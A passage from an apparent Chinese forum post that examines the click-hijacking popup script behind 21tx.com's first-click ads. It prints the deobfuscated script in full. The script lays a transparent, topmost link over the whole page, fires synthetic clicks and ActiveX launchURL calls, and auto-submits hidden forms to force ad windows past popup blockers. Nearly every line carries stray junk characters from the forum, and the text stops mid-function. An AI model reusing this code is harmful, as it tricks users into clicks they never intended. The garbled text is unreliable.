天星网ClickJacking点击劫持分析
; i \0 R4 o) x# I4 Yhttp://www.21tx.com/ 天星网
0 ]% |; x8 Q; X9 s* X; C8 E我得联系联系作者 # j1 e: H( }2 d9 e
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
7 e* ~8 E O5 _9 \6 d2 p rhttp://www.lxting.com/script/popup/v1_min.js9 y: |0 e( e, [: z7 k. E# T G
4 F0 e7 s- U Q8 ~# u9 [2 I这个是锁定到底JS脚本,4 P0 M7 |/ r0 ^' E
解密后的代码- (function() { % S/ _5 o; e( ^9 j1 {' L. d
- var aa_url = window.ytpp_url;
0 f0 F6 D. o6 G% b' ^ h( N0 F/ F - var ua = navigator.userAgent; + f6 u9 D/ K7 P/ }3 j' i9 S& M
- var form_div = document.createElement('div');
+ z9 A: ^4 C. G! l8 y - var form_pd = 0; * D. r- J. R1 F) c- l
- var browser = {
% }" ~& N, p2 S0 r$ i - ie: /msie/i.test(ua), 4 B2 f$ v" U- h5 ?3 M$ B, _
- ie6: /msie 6/i.test(ua), 3 l' B3 k. ?' {' q2 `
- ie7: /msie 7/i.test(ua),
( H, M. }2 v7 W' r( b; J - ie8: /msie 8/i.test(ua),
" y$ L" f) k" X. U- _& r2 Y - ie9: /msie 9/i.test(ua),
1 q0 ?7 y8 p2 D- K" h6 n2 p - 360 : /360se/i.test(ua),
3 a2 Q0 \& h% f0 U - sogou: /;?se.+?MetaSr/i.test(ua),
# `" I/ n$ [, t. n- i/ ` - maxthon: /Maxthon/i.test(ua), 1 b$ [* a/ s5 g2 l0 R2 E5 _! _
- tt: /TencentTraveler/i.test(ua),
" u. f. f; c3 x% J; ?' r, j - ff: /firefox/i.test(ua), 7 k9 J( R* o& U5 G4 F5 V& Y9 \) Q
- webkit: /AppleWebKit/i.test(ua),
7 r% F5 m! g n9 _ - opera: /Opera/i.test(ua), 5 h% p; w0 d" A# Y5 X! O; b+ C; q
- qqbrowser: /QQBrowser/i.test(ua),
6 J6 Y+ T9 X, x6 Z* D - cr: /chrome/i.test(ua), 7 z# ? L& w9 i2 W, x
- gg: window.chrome, ) p- S9 d% v4 J& A2 P/ W
- theworld: /Theworld/i.test(ua) 7 |5 j, J) U4 Y# q7 z, A" ^/ Z
- }; " q& X# V' k* E1 x+ q$ O$ T
- var _setting = ""; 5 N. Q6 F% ?% f
- var _ct = 0;
' N# J, u) w: \% {" |+ F - var _le = 0;
; g7 o; c! ^7 L& c8 c - var _pd = 1; : V) A" E5 W5 O
- var _pd2 = 0;
, R" {; i, T1 Q - var _pc = 1; & N! v- u$ R; h* ~ N) q8 c
- var _pc2 = 1; 8 F. l$ g/ u- I) W9 s% z# t: ?9 z
- var _pco = 0; 5 Z6 y9 Q. T2 V. b- `% l
- var _pta = 0; " k8 E4 C. m3 o3 {! u+ P. n
- var _ptb = 0; / P$ g8 a' P$ X, D7 q9 R1 E0 t/ y
- var _pt2a = 0;
5 a# @) J# h3 W) r t8 X - var _pt2b = 0; ( N! Y4 b: n! w/ E# V7 ^9 v
- var _pt3a = 0; - a5 F; X q) g1 N, L5 U
- var _pt3b = 0; 7 S! l# W2 B& \% a
- var _pt4a = 0; " R& j! m8 L% F# O* m; A
- var _pt4b = 0; 0 C" [" E2 R* D; n* `3 ~1 M
- var _pt5a = 0;
% w9 j' s2 o' P; y* Y8 i) \ - var _pt5b = 0; + e2 p5 g+ [! j2 `3 N- S, N8 x9 e
- var _pt6a = 0; 9 ~" B) i6 N( z' M
- var _pt6b = 0; ) j. N; Z& ?* o8 I7 m, r( I
- var _pt7a = 0;
/ c* d1 s5 a; M3 O - var _pt7b = 0;
2 I+ E) P1 P$ _8 _ - var _pt8a = 0;
/ N U$ o3 b5 d3 ` - var _pt8b = 0; ; a) O6 G6 x/ K8 q
- var _pt9a = 0;
, z9 @4 _0 ^, _$ H6 c! M - var _pt9b = 0;
/ J2 E% P' ~7 L7 S" g' H5 j: H - var _pt10a = 0;
( \( r. w" C3 _6 W( p! l - var _pt10b = 0;
1 _1 B' `. \4 D4 U2 v# c - var _po = 0; 8 H: s4 G$ V0 E! }* [9 X% w8 z
- var _poo = 0;
# j8 ^+ b& L/ ^! Z4 j* k - var ckn, ckt;
& \' H1 l5 D% i5 k - var ads = 0; 9 x: [- ^. Z' B/ V: o7 X ^
- function b(w) {
. H6 [% p) A! H: h2 _9 v$ k - var s = w + "="; x& O% M; e$ R+ e6 V) M- `
- var r = "";
4 i; T8 f3 s) ]- q5 F8 f2 \$ | - var o = 0;
3 m% ?/ R) C% n# ~% l6 d" T1 e ] - var d = 0;
! L! }: f5 O. o+ u: n$ w% H7 ` - var p = document.cookie;
2 {* j2 x- ^- I O! k$ F - if (document.cookie.length > 0) {
' L1 B9 }: T/ N - o = document.cookie.indexOf(s);
H1 ~* b6 z3 ~9 Z - if (o != -1) {
# F) m+ W4 v, q - o += s.length; 3 f# B% i3 X) W) J5 }8 \8 `
- d = document.cookie.indexOf(";", o); 1 A3 y; F+ I" G% F9 q
- if (d == -1) d = document.cookie.length; - @# L% A4 c0 T P$ e
- r = unescape(document.cookie.substring(o, d))
$ Y, K" M& c! J# a& z) x. y0 q - } & E$ e, ^& K! _1 S- u% ~9 F; T$ O9 M
- } \" ?% a6 \( |8 F) ?+ D
- return r
4 t" c, h$ A- X - }; / T7 m- `. R; s0 F9 {
- function p(w, p, v) {
* a# F& c0 G' K% O7 \( B! D+ s - var t = 30;
- Y& j; H* P6 k) H( H - try { 5 v L$ O! v4 r/ k$ ^
- t = parseFloat(p) * 1
' l% t' J: `( }0 u: N - } catch(e) {
6 |1 }; V2 Z( P- I) u/ b - t = 30
" t" @/ K/ Y* |' ] - } w9 E0 l, c% l9 c# l$ p$ T
- if (isNaN(t)) t = 30;
% S6 i+ d3 T' | - var then = new Date();
/ d4 P( Q" k! u! t - then.setTime(then.getTime() + t * 60 * 1000);
" k' ]! G. V9 l1 }2 } - document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
: k2 x5 H# ?# ~& k$ N0 ]) o* P - };
8 h* w3 a% M: N4 }, m, q! m - function init() { ' l1 B3 b, ?) R% X
- _setting = ytpp_sti;
8 t; O& I0 A- h- R1 f- ~ - if (getp(_setting, "CT")) {
6 ]+ v! ~' P5 a. F" W6 y$ m - _ct = getp(_setting, "CT") % P' U8 b' f; r5 _7 s
- } 2 O2 [% r8 j# c% S
- if (getp(_setting, "LE")) {
; {' j9 w; D2 Y - _le = getp(_setting, "LE") Q, ]3 X9 l# f$ \( u
- } 3 ]5 O2 Q% x4 V* [& l* Q8 R& t3 U
- if (getp(_setting, "PD2")) {
* f2 t' g5 T# J4 I) U& k - _pd2 = getp(_setting, "PD2") ' V' j X( A, H0 K
- }
4 \" o3 j) M/ X: z m - if (getp(_setting, "PC2")) { ! X* V) b, v& T" E
- _pc2 = getp(_setting, "PC2") 6 ^! O# g4 I+ a) L
- }
Z, i7 g1 W2 O4 S" X - if (getp(_setting, "PCO")) { $ `2 k4 Z; ?" F, ~5 f2 c
- _pco = getp(_setting, "PCO")
# q( t6 G# Z7 P" ]* B" x+ Y" P - } , T! A9 m8 _, R' U
- for (var i = 1; i <= 10; i++) { 2 Z* `% I( d7 A: ~0 W* \7 O! N
- var n = i == 1 ? "": i; 7 i# v5 z6 b- |. k) D
- if (getp(_setting, "PT" + n)) { - L1 |# _ I+ [. X: n2 Y5 r
- eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); : z" C6 g" ^+ b* d8 t3 ^
- eval("_pt" + n + "a = _pt" + n + "[0];");
" i' {6 {( G* F( P: | - eval("_pt" + n + "b = _pt" + n + "[1];") : h3 u+ C2 }6 H' C, X' W
- } : B& p6 D1 c& `* J5 @
- }
5 G/ K6 Y) s' ~$ p - if (getp(_setting, "PO")) { 7 D2 R! f( w$ @. X$ [, m
- _po = getp(_setting, "PO") / n' Z( N6 _4 z0 q
- }
Q6 w( e3 b. Y& f' @% `6 t) s - if (getp(_setting, "POO")) {
' a/ \/ L6 J& } - _poo = getp(_setting, "POO")
e. b9 i6 y5 L. o) p - }
$ f' a7 E0 a1 F0 |- t3 m9 d - if (_pco == 1 || _poo == 1) { 4 F5 [* o9 U5 X; X
- if (_poo == 1) {
. Y" m/ U! t; G5 d/ D {' g - _pco = 0
" H+ N4 p, x5 }: O/ R( G8 ^0 K9 Y - } else { # d6 u$ s: X+ d- L0 [- o
- _poo = 0
0 s5 z+ H) J% a2 X/ y$ y - }
9 \: V; u5 s- t) ?9 U - _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0;
0 O F0 D* v% V( o. h5 r- J - for (var i = 2; i <= 10; i++) {
1 X) S, }1 O8 ]* {$ o. z0 _: I - eval("_pt" + i + "a = _pt" + i + "b = 0;") " u% Q. W( x) ~( B
- } 2 V; ]1 j: A7 u+ `& m$ g4 `1 H
- }
9 b1 s' M2 M2 | - }; " k8 Y9 Q8 m, A' M0 h! I4 l
- function getp(s, p) { - ^6 g |! q6 p
- var i = s.indexOf(p + ":"); . W& O0 C6 g7 [7 |3 {
- if (i >= 0) { , j( M$ d8 @3 p, f. W
- return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) ( p) ~4 U0 b1 s. P6 H& R$ s
- } / L" V D, [" @3 k `4 X. e: L# E3 i7 M
- };
4 A8 C) w) k6 I* @3 R$ P4 g8 s - function event(e, event, func, act) { 7 J. ?, u5 N7 a
- if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func);
- E) S3 i* V, |4 [+ ~ - else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) . l( Q2 `' J+ e3 J4 v$ {; }6 v/ s/ P
- }
" D7 A! c: y3 S: Q - function pop(url, param) { ! y6 k B& S; U' P
- if (!document.body) {
7 {. ^- s( L f& p* | ~ - return setTimeout(function() { ) M$ X! l [7 M7 q2 O
- pop(url, param)
& |. O& N! g5 }2 M0 ^ i - },
6 ^/ u6 I0 t* v, A- Z" a- ~6 v - 13)
0 `2 [ J& H- K4 B* Z& F$ t - }
6 L6 n' G" j4 O6 y1 e - try {
- W! k0 x* z( E6 J - if (browser['cr'] && browser['gg']) { , w" m) J& L! S3 C& H( a
- try { 8 Z I1 z9 [" A7 t
- hrefopen(url)
9 {$ p# t+ X* g, h; ] - } catch(e) { / U- @/ v8 ?) B4 @ s8 [
- a_pop(url)
/ i7 W( b: o; s% O- S* F0 o - } 6 l( K8 l! G' x( r* d
- } else if (browser['webkit'] && browser['maxthon']) {
2 k3 m- Y' g& C( {6 G7 a - if (!func(url)) { * `% Q1 ^7 M5 j$ V0 Y
- try { % D2 h% N! S; n6 M
- form_pop(url);
: @0 Q! e# P+ R+ B: i- O- N( |9 F - a_pop(url)
7 C* r5 A) U$ w2 `% k5 V - } catch(e) {}
% ]; y$ Q( C# `5 s. M! }% v8 v - } 5 y, w7 V. d8 K( c
- } else if (browser['tt']) { 3 Z) G+ y0 E" e) e6 d1 a
- try { * W. P, ]0 `+ W0 |
- object_pop(url) 9 e: P) x& E% J
- } catch(e) { . ]; R+ F4 b/ z+ |5 A: g
- a_pop(url) 0 T2 j8 j+ h1 o- F h8 c. T
- }
+ d# y6 a8 Q2 G. O, P - } else if (browser['sogou']) {
9 \, J, ?' W1 \7 H# j/ [ - if (!func(url)) {
* V V- w$ x5 ^! X4 K - try {
- Z- O; H8 j1 K$ T/ u - a_pop(url)
$ k# q/ @$ W: m6 k - } catch(e) {} * V& _+ j6 Z- a q% {5 \+ i% p, w
- } & |0 @4 a7 V" S" X1 m' Q$ ^ P
- } else if (browser['webkit'] && browser['qqbrowser']) {
8 m4 X4 p. x% b' w* ? - if (!func(url)) {
: d) u# s {8 }' o: A$ x" x - try { . x/ @$ n; @( e1 x7 x7 M8 G
- form_pop(url)
) ]8 h; p; v' ^: E# S - } catch(e) { 8 E* K( H( l. U
- click_pop(url)
; b, A9 j* Z s+ x( L+ W - }
) B1 B2 |2 e6 ?* V - }
1 s3 P+ @2 D! Q: o+ \ - } else if (browser['webkit'] || browser['opera']) {
# m! w5 u* _0 U2 n# s: {+ b - try {
+ H* M4 {$ v3 } C2 a. l+ ?0 ] - form_pop(url);
( J- _0 W! P* k; S* p; Y! {1 D" p! R( `8 j - a_pop(url) ; P1 g5 z- z6 R0 J. D2 G N, `7 L( ^
- } catch(e) {} : j+ i; P# n7 _" w' Z+ e+ M
- } else if (browser['theworld'] && browser.ie6) {
* Q# o% e" u' w# h$ H - if (!object_pop2(url)) { 7 _% @& Y, |/ U5 C# e
- a_pop(url)
4 k, j j# L, O - }
5 z7 V3 g0 @# s! g - } else if (browser['theworld'] && browser.ie8) {
$ u) \/ n% M9 ^* ^1 }( q - if (!func(url)) {
( ^5 X8 N; g( m/ w2 V - try { 2 h6 O+ d. c2 S: h2 W
- object_pop(url)
9 g2 Y5 k9 ~1 A5 R/ ]7 B - } catch(e) { 0 U r5 o5 e5 o( N% B
- click_pop(url)
1 J+ L3 G+ N" j( L- o' D - } % ^) I% @0 S0 [1 C. u6 @
- } % ^3 z0 j5 I/ O. M8 y
- } else if (browser.ie6) {
8 X4 K. Y" r4 j% l6 e4 N - if (!func(url)) {
7 J* m( X/ D6 A+ g - object_pop2(url) : X% B6 H+ r" Y% z5 M
- } + {$ y1 ]. F) g: e' a
- } else if (browser.ie8) {
: @: q& ^: j3 l N - if (!func(url)) {
6 Q1 v, I9 }, l( m6 w. x - try {
: s$ g) z3 {: b3 N - object_pop(url)
- X ^3 O2 _ J/ \# u6 y - } catch(e) {
( g8 N8 l; g8 t# c9 T: ?! Y: K - document.onclick = function() {
0 |+ D" y% b$ o' `% f' c: M - func(url); E7 v# }( q/ j' e1 m, n; R9 }6 Y
- document.onclick = null
9 q6 G$ n% _( ]" F* ` - }
6 {) ?. D8 Z1 _$ {/ r - } 2 Y# \6 A0 Z. l/ Y# S
- }
R% m% e. {" d$ C2 ^. E! O - } else if (browser['ie']) {
; g4 ~" t% l* G: \& q X, ] - try {
$ v2 ]$ [: s' R5 C2 k - object_pop(url)
; z: M3 V% k: e) L. ? - } catch(e) { 3 H! L& P; d) i2 {; l' N
- click_pop(url)
0 b( G ?3 o+ u, r* k0 K$ ?- D - } e* X+ p! m { v! g
- } else if (browser['ff']) { & i7 n1 W7 Q9 e0 G4 z o5 d
- if (!func(url)) { # K( @8 J* j8 e& h; N1 f6 C; E
- click_pop(url)
' {; o4 s( u; Q4 `0 S0 ?& V4 q4 i - } & Q/ r- _3 n2 z& o/ l
- } else {
! u% |4 @+ R' C4 r& f - if (!func(url)) {
( J5 j7 L1 H* J8 r - click_pop(url)
/ G0 q7 c. d" [: _! F - }
# D& }3 u6 L2 L& E4 o - } ( B- {1 l# `) y
- } catch(e) { * u0 }! R/ l8 A n ^3 e
- if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) {
/ E q' @- `" L, G' `6 R - click_pop(url)
- y8 a9 Z( m K4 a. G- C - } else { $ c$ P( ?0 S1 B7 j. y& B/ S
- a_pop(url)
# u% I, {! h. C9 T6 D - } % s( Z. m7 j" o' B" P6 y
- }
6 x/ x- b% A6 \ - } ' g, v- }) ~% p$ K* y$ S" k
- function object_pop(url, param) {
4 |* b6 }( D, V& }2 n0 G! A1 Z3 F - var object = document.createElement('object');
# A; C9 P3 p/ E1 S. c - object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); ( d/ e( s R6 F% Q/ h0 g
- object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 9 |; D/ \4 e/ k- h3 g$ o; x$ `
- append(object);
1 X: O! _# G' F - object.launchURL(url); % f( S! W/ y2 ~7 V5 O% x
- ads++; ; Z/ D# o1 p+ c1 ?9 r7 O+ Y
- p(ckn, ckt, ads)
$ j3 y1 Q; F7 }* h' b/ @ v, f - }
& h9 m1 |. q+ `* U5 t8 ?- l8 w - function object_pop2(url, param) {
7 l. P2 i0 U1 A$ B - var object2 = document.createElement('object'); o7 r: N1 b, o3 R2 D1 v4 ]
- object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); ) A) [" M' e9 l# M; i8 k
- object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; % x5 M+ \" y+ K) ?
- append(object2); ' m% b7 w+ r- W0 ?2 X$ w h, D; _+ ^2 U
- for (var i in object2) {
4 u- k; Q0 J4 r" p# @+ @ - try { (function(o) {})(object2[i]) 7 J, t% U5 \! A' X! X1 K: O
- } catch(e) {} 9 S1 @' z5 W6 I, o# m0 {
- }
2 g6 W/ m* Y% o$ _* g, z - setTimeout(function() { 3 e& X+ M9 J8 h8 x0 R4 E6 W
- object2.DOM.Script.open(url, '_blank', '') 0 A" R* D( e9 a9 r7 g
- },
9 ]3 `+ [) e) ] - 500);
2 K% n7 R# V, w - ads++; ! q1 T$ v3 ^/ m
- p(ckn, ckt, ads)
; H. D7 r$ J y+ v) { - }
1 M3 ?* L3 l0 V, F! u - function append(e) {
4 {' B/ V; t( O/ y- D1 b, ?6 A. l$ _ - for (var t in {
# u1 p' R( V; Z1 f7 E - body: 1 + H5 g* u% C7 c; A& z' ?
- }) { ( I$ O; @4 j) c# J* Q$ h
- var ele = document.getElementsByTagName(t); # P& \$ c" y; d: t( O6 E% t# ^
- for (var i = 0; i < ele.length; i++) {
( v; B* D+ s9 j - ele[i].insertBefore(e, ele[i].firstChild);
7 d% a$ Q/ Z- U$ _) ? - return6 S$ [' ]. C- P/ l4 p8 R
- } ( [( n' N+ a- V% Z
- } 7 u$ E; \8 W4 @/ A, s& F! m+ v
- } K; d+ }& t% h: F2 U' A! r
- function hrefopen(url) { 0 q0 z$ R; g9 A8 z
- try {
+ W! F4 L# Z u - var c = document.createElement("a"); - |' V& ^, P+ V; ?/ ~& Q) l
- c.setAttribute("href", url); 9 W; k2 y. w4 ?0 u
- c.setAttribute("target", "_blank"); 1 o8 }; \- u v* x/ O
- c.setAttribute("style", "display:none;");
% P: l: K" F9 }( k' U - var b = document.createEvent("MouseEvents"); * H- @8 i5 d7 v* }
- b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
5 z& X ]# J2 Y' x; \8 H1 C h/ f - c.dispatchEvent(b);
1 T# f/ Y. |* E O2 l" |: ^+ j - ads++; $ R/ Q/ P# [$ S$ b0 u; b
- p(ckn, ckt, ads); ' u* w X9 h- k) x
- return true' {% ]! N f6 `( P8 A" r; `
- } catch(q) { , P8 ]; k1 \3 l' \" x! D0 J
- return false
$ h9 l/ p' W4 q* A - } 3 {* L' a/ @& U* D
- }
; J- c4 N# i! N1 J3 { - function form_pop(url) {
) l8 b5 K# j" C - form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 7 x0 y/ R6 c* Q
- form_div.setAttribute('style', 'display:none'); * v# {1 ]2 ?3 ~' B. K* K. m0 @
- var form = document.createElement('form');
. {, }; t4 F9 _; _ - form.setAttribute('action', aa_url);
, a5 v5 B# E: b+ H0 J8 _ - form.setAttribute('method', 'post');
6 t) b1 i0 w8 J- f: g/ f - form.setAttribute('name', '__unionsky_push_d_form_box__');
9 S) D9 @( r5 w- j - form.setAttribute('target', '_blank'); ' q( y% L) `9 n V: J! E
- form.setAttribute('style', 'display:none');
: K \2 p, A$ y4 ?: W/ T; f - var sinput = document.createElement('input'); ! {' `$ e% B1 w' ^3 {& K' q
- sinput.setAttribute('style', 'display:none'); & b" l! \6 j. G
- sinput.setAttribute('type', 'submit');
0 O5 [" z1 i! N) O" q; l" k2 |% [. l - sinput.setAttribute('id', '_sumit_2app');
3 E! z1 B! T* O$ h4 ^% _& {0 \ - form.appendChild(sinput); ; d1 k! R1 I, R/ k
- form_div.appendChild(form); . M1 O9 J* m) d5 |5 Z6 q6 }& a: s
- append(form_div); 1 O D- R/ N& h2 g+ v1 }4 t
- var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; / l- D* X. s+ @4 d2 N' d
- try { ; r! P1 }! H$ I0 W0 W
- document.getElementById("_sumit_2app").click() ' F j$ l* V/ W' n$ e
- } catch(e) {
: C: Y2 z! Y& ~# P6 z) V0 d - event(document, 'keyup',
: z& f5 \5 F5 ~7 H. F - function(e) {
% Q0 z o* T2 t6 h% R4 W - if (document.getElementById('__unionsky_push_d_object_box__') == null) {
* b& h4 J) f/ n - return2 \# B* A3 U3 Q
- };
4 o2 P5 s# f Q: f6 i - e = e || window.event;
2 t8 L1 L2 h+ N7 u& m4 o - e.canceBubble = true; % d- z7 \3 t" M# J" D
- event(document, 'keyup', arguments.callee, true); : T/ ~1 h7 Y& A4 \! A f: t+ V
- form_pd = 1; * L& C2 J. Q% O5 _! }0 d8 h
- unionsky_from.submit() 2 d# E" [ i% F( r; o* n" v
- }) / Q5 Z1 |3 n& ]; @, Y
- }
3 c2 o( u! o7 M6 L% j# z. J - }; & m2 }5 _- H$ V+ P
- function click_pop(url, param) { ]9 j. k( y' Y3 h( J3 K+ ?/ A; c
- event(document, 'mouseup', " @* h2 Z- o9 Y8 o+ T
- function(e) {
+ X5 u# [$ m: S! Q+ F7 M - e = e || window.event;
8 G) N4 Y9 b0 i' V3 F - e.canceBubble = true;
* T7 J! H( N: y7 k/ S1 X - event(document, 'mouseup', arguments.callee, true); 9 r! A L. m* K4 }# H
- func(url, param); ) D) I. h |1 I( X# d
- ads++;
! f- T' Z) H8 d3 w8 O7 F8 O - p(ckn, ckt, ads) ! L6 s/ b# r4 X( {) K2 ?- x
- })
: p) C+ f M- q6 m$ m - };
5 u2 ^, h/ V3 i, f" G# P" I - function a_pop(url) {
8 m( @% y, c7 N* j& R8 \ - if (ytpp_plid == 166028) { : O, T, B3 q' u- Z! a4 R. }% b
- return
4 T1 _5 U, } ~4 E: d - } a# w E" V' P1 Z1 c4 U& o
- if (!document.body) { : x" F6 F( M- t& I$ z
- return setTimeout(function() { 8 m/ m8 `; C4 J0 U# ?
- a_pop(url)
0 o: l6 c$ }% A2 q - }, ! j! `+ J g* c: B) w. i
- 13)
6 y0 X- c+ U5 b8 _4 j/ i& e - } ( `% H/ O7 }% R# O# o ~3 T# R
- var a = document.createElement("a"); : f. g/ C) P* {1 N5 u
- a.href = url;
+ c$ t6 h9 O. M/ m - a.target = "_blank";
: V: f1 R: t" p) h8 b; { o - var div = document.createElement('div'); " D) b: q( T u5 E, k/ V% X* N% j% W1 ?
- div.style.backgroundColor = '#fff'; & R5 Q$ t) C" y$ Z% x4 x3 j
- a.appendChild(div); 3 ?; Z) \4 W6 k J4 z6 Z9 {8 M
- append(a); 5 f. x; s, K' V9 N
- var as = a.style;
5 X; I6 M6 }8 p' ~) ^- p# C2 \ - as.position = "absolute";
/ k. R x' I. [2 M1 ^1 V/ z( `7 A - as.zIndex = '2147483647';
( E: k8 l* {$ T1 Y% a& B/ c4 C - as.display = "block";
/ b. J) Q( c) I- h" r6 Z% d4 V - as.top = "0px"; - c2 i) O. K: `, H# P
- as.left = "0px";
6 R4 }4 d3 m" h/ }1 e3 J8 ]" w - as.cursor = 'default'; ! L5 f' C ^2 Q; M4 ^4 g
- as.opacity = "0";
$ |% F, g8 i0 }4 z, s - as.filter = "alpha(opacity:0)"; ) W3 R1 Q* J( D* D
- var m = setInterval(function() {
1 @" _2 r; K1 x - if (form_pd == 1) {
, _2 T! s" J: K$ a' K6 R - a.parentNode.removeChild(a); , A6 z8 y0 v- v* }4 A
- clearInterval(m);
' ~5 {2 E! Y s$ J# X - return9 [* }9 z1 R1 b8 U
- } $ H8 `$ Z% X4 w; c1 Y) ]
- a.style.zIndex = '2147483647';
6 s q* S9 A9 i - var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
8 u- J0 X* |1 H' A" Z7 l+ k1 t" e2 t - a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; / q6 O8 \! O5 W" [2 R
- div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px';
( i- n+ \6 ^0 ^1 D( N - div.style.height = d.clientHeight + 'px';
- t- ~3 f. B% E - if (browser['ie']) {
+ Z2 x( v0 \' N. H* m5 K5 j) t - try { & S3 }6 L# [7 y( K6 x
- var divs = document.body.childNodes;
7 o4 a8 a% I8 t4 U" n* v - for (var i = 0; i < divs.length; i++) {
7 M7 D) ]2 I; `* k7 t7 e! j - if (!divs[i]['style']) { / y$ z& t/ i. w! B0 c A
- continue8 [, ?9 ~; v3 s- K, k3 P
- } ) q# ?+ [8 m) A; s8 W& Z
- var _i = parseInt(divs[i].style.zIndex); ]0 ~6 F, s/ W
- if (_i && divs[i] != a && _i == 2147483647) { " e8 L$ @2 a/ s7 }; i
- divs[i].style.zIndex = _i - 1
3 ]1 z& B8 m. }& E - } 1 L' Q1 `9 T* _" D6 \& A+ c
- }
( |6 c' N0 u8 } - a.style.zIndex = '2147483647'
. {, z! x8 |" ]3 d3 x - } catch(e) {}
5 {8 D" f8 p4 j, v - }
/ C- C2 g" l4 N) w, t; @ - },
8 ]# o" M5 C% \ - 120); 8 n* t( R6 s& D6 w+ o
- a.onclick = function(e) {
! S+ O& n/ q# T - if (document.getElementById('__unionsky_push_d_object_box__') != null) { # I/ W: t! p7 w- W
- form_div.parentNode.removeChild(form_div) : h0 N& c. i1 P' M( u5 R& F7 {# v
- } 1 G! b" z9 n$ r, C
- e = e || window.event; 7 j$ U1 h/ q. o- c
- e.cancelBubble = true; 6 ?; }% \& ~, R+ P" R9 c4 t% U
- setTimeout(function() { * V: d5 Z6 f. \4 _' d! u4 K
- a.parentNode.removeChild(a)
2 ^- x8 ?3 X# O3 W0 y1 }9 ? - },
; Q9 g* ]- Y3 y) S5 [ - 200);
" K8 `' d" a# [3 B: k4 k - clearInterval(m);
, J Y, \9 s$ z+ G0 w - ads++;
" |% ^' K+ q) d8 k k+ e) a - p(ckn, ckt, ads) + s& C7 t/ k7 V! N( k- t) v
- };
b# v4 H- A8 ~/ A* R \2 i) G - event(a, 'mouseup', * c i! _* U& t5 [+ M
- function(e) { 2 i# {) a( A+ |* W2 m- d; a) ^
- e = e || window.event;
. l# V$ x% V5 \+ W2 v - e.cancelBubble = true
5 a! h! Z6 A+ u: A H. [ - })
3 F2 Z0 _$ U/ i( w$ q! X0 e! s - } : s; R' W2 {' X+ V C# X7 ?
- function func(url, param) { / b$ ]4 H% u3 H
- var f = window[String.fromCharCode(111, 112, 101, 110)];
x( b( p7 B5 X8 s# @6 C+ K& X - var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height);
2 Q2 y' D3 h' T: G5 J* {: t$ h - if (w) {
. G. i$ R7 ^8 {6 F+ s4 q - ads++;
+ L+ x! Q7 p- f0 O2 M - p(ckn, ckt, ads) 7 ^5 g! v. N0 [% a0 o6 U0 l
- }; . h5 H1 H& W$ {2 n& B7 H9 x- ~
- return w ! n. I- v+ `" `7 i) {
- } + L! R8 ^- N2 J
- function fstart(url) {
& P6 P* S& a2 ]5 B O2 H) n& v - init(); ! Z$ E* U: z, L
- if (_ct >= 0) { + y4 ]# e2 ^# }" a" b2 U
- ckn = "YITIAN_NUM";
. x, l$ g( S) I- K - ckt = _ct
' ~& f9 Z. U8 q; w$ `$ m - } else { ) b- G2 `, x7 B, R" k: j j7 ~
- ckn = "YITIAN_ALL"; 6 r- }6 X, ]' I" a7 Q; q* F
- ckt = Math.abs(_ct)
# h- R1 p0 {' k' D. o% W# ] - } 5 E& p) Q+ N$ K! O* b P
- if (ckt > 0) {
/ m: R5 |2 B# V2 E9 h - if (b(ckn)) { 5 C( A$ ~1 n5 ~0 f }
- try { : y+ n' V$ ~% F+ a
- ads = parseFloat(b(ckn)) . r! n2 y& m9 K& B6 k' d
- } catch(q) {} , v+ P& z' `0 i3 F3 D. T$ L
- }
/ b5 @& m8 C& B4 ?& v - } ) |5 a9 ]8 y- F# b5 @; R* G6 d
- if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) {
* y4 D/ ]6 x2 Z) F0 i5 w% K! s, Y - return7 l7 ?: E! Q1 ?7 o. I% ]
- } else { 6 q8 n. B* L2 u7 Q5 _6 H
- if (_le > 0) {
% h" `3 C$ f7 \+ F/ y - setTimeout(go(url), _le * 1000)
2 p8 F! z8 h* \9 Z2 C' L% q: @7 M - } else { ! N) O$ N) p( b0 B' B7 O2 }3 x0 [
- go(url)
3 r M, j* a9 n$ p8 ~4 n- q- C - }
- c( ~& ]1 | {3 { - }
- n% N6 y {+ P - }
! j4 m& C" ~* c2 U - function go(url) { e2 z- \% y+ S& r
- if (_poo == 1) {
7 D% j5 N3 Y- [5 ]4 n - try { : u! {/ ], ]' O8 d
- func(url)
! I0 B) Y, c$ u+ C3 P" ~+ m% v4 [ - } catch(q) {}
3 t, T8 W Z* c' R# p" ` - } else if (_pco == 1) { : `& T9 e L0 p/ g+ j
- a_pop(url)
( v2 m1 L/ [5 d" w* M, i - } else {
1 q& x0 \9 \" } @, e5 ^4 m& u - if (_pd == 1) {
) j: \1 O) p2 A8 r$ _7 ^& F - setTimeout(function() { + c6 } s, n7 A* A `; E
- pop(url, {
% [* ]# j/ B( i* {" |4 [ - a: 1, ' g8 C1 K' {7 X% y
- b: 2 : H7 V/ g+ h; f5 o# C+ |
- }) & R' t7 c5 i3 b8 M
- }, 7 _- n3 X* Z1 o, b8 W
- 300)
1 R# e; z- z4 m# ]+ P - }
1 }) A# W6 p) U - if (_pd2 > Math.random()) {
6 g; g! ~9 k0 ]9 C% Y - setTimeout(function() {
